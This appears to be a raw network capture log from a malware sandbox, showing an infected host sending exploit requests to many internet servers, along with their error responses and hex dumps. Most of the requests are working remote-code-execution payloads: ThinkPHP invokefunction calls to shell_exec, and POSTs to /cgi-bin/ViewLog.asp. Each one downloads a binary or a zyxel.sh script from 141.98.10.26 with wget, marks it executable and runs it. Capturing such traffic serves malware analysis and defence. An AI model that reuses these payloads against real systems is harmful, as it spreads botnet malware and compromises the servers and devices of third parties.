Nov 22, 2023 08:39:14.837282896 CET	10357	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 22 Nov 2023 07:39:14 GMT Date: Wed, 22 Nov 2023 07:39:14 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 63 37 33 65 31 32 30 32 26 23 34 36 3b 31 37 30 30 36 33 38 37 35 34 26 23 34 36 3b 32 34 66 33 34 65 33 32 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.c73e1202.1700638754.24f34e32</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
530	192.168.2.23	50526	88.221.4.64	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:14.679114103 CET	10353	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:14.863895893 CET	10359	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 22 Nov 2023 07:39:14 GMT Date: Wed, 22 Nov 2023 07:39:14 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 62 63 65 36 36 35 35 66 26 23 34 36 3b 31 37 30 30 36 33 38 37 35 34 26 23 34 36 3b 31 30 34 37 63 37 30 30 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.bce6655f.1700638754.1047c700</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
531	192.168.2.23	54606	112.165.91.225	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:16.528057098 CET	10579	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:16.813469887 CET	10589	IN	HTTP/1.0 400 Bad Request Connection: Keep-Alive
Nov 22, 2023 08:39:16.813487053 CET	10589	IN	Data Raw: 4b 65 65 70 2d 41 6c 69 76 65 3a 20 74 69 6d 65 6f 75 74 3d 32 30 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 0d 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e Data Ascii: Keep-Alive: timeout=20Content-Type: text/html<h1>Bad Request</h1>

Session ID	Source IP	Source Port	Destination IP	Destination Port
532	192.168.2.23	55552	112.126.144.207	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:16.547472954 CET	10580	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:16.851990938 CET	10591	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 22 Nov 2023 07:38:52 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
533	192.168.2.23	55046	85.69.25.244	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:16.598323107 CET	10582	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:19.815428972 CET	10959	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:25.958458900 CET	11679	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:37.988759995 CET	13118	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:02.817260027 CET	16123	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:51.962563992 CET	19773	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
534	192.168.2.23	56786	95.142.184.11	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:16.621330976 CET	10584	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:16.830509901 CET	10590	IN	HTTP/1.1 404 Not Found Date: Wed, 22 Nov 2023 07:05:53 GMT Server: Apache/2.0.59 (Unix) mod_ssl/2.0.59 OpenSSL/0.9.7b PHP/5.1.4 Content-Length: 333 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 30 2e 35 39 20 28 55 6e 69 78 29 20 6d 6f 64 5f 73 73 6c 2f 32 2e 30 2e 35 39 20 4f 70 65 6e 53 53 4c 2f 30 2e 39 2e 37 62 20 50 48 50 2f 35 2e 31 2e 34 20 53 65 72 76 65 72 20 61 74 20 31 39 32 2e 31 36 38 2e 30 2e 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</p><hr><address>Apache/2.0.59 (Unix) mod_ssl/2.0.59 OpenSSL/0.9.7b PHP/5.1.4 Server at 192.168.0.14 Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
535	192.168.2.23	42574	85.208.123.142	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:16.638555050 CET	10586	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:16.859392881 CET	10593	IN	HTTP/1.0 400 Bad Request Server: squid/3.1.23 Mime-Version: 1.0 Date: Wed, 22 Nov 2023 07:11:38 GMT Content-Type: text/html Content-Length: 3167 X-Squid-Error: ERR_INVALID_URL 0 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 20 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 20 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23 74 69 74 6c 65 73 20 66 74 70 73 75 63 63 65 73 73 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 66 66 30 30 3b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 62 6f 64 79 20 63 6f 6e 74 65 6e 74 20 61 72 65 61 20 2a 2f 0a 23 63 6f 6e 74 65 6e 74 20 7b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>ERROR: The requested URL could not be retrieved</title> <style type="text/css">... /* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License// Page basics / {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area /#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('http://www.squid-cache.org/Artwork/SN.png') no-repeat left;}/ initial title /#titles h1 {color: #000000;}#titles h2 {color: #000000;}/ special event: FTP success page titles /#titles ftpsuccess {background-color:#00ff00;width:100%;}/ Page displayed body content area */#content {padding: 10px;background: #ffffff

Session ID	Source IP	Source Port	Destination IP	Destination Port
536	192.168.2.23	55810	62.4.10.161	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:16.772635937 CET	10587	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
537	192.168.2.23	58464	85.24.246.69	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:16.794625044 CET	10588	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:17.831669092 CET	10650	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:19.047441959 CET	10766	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:21.607202053 CET	11182	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:26.470360994 CET	11783	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:36.197084904 CET	12888	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:56.674226999 CET	15327	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
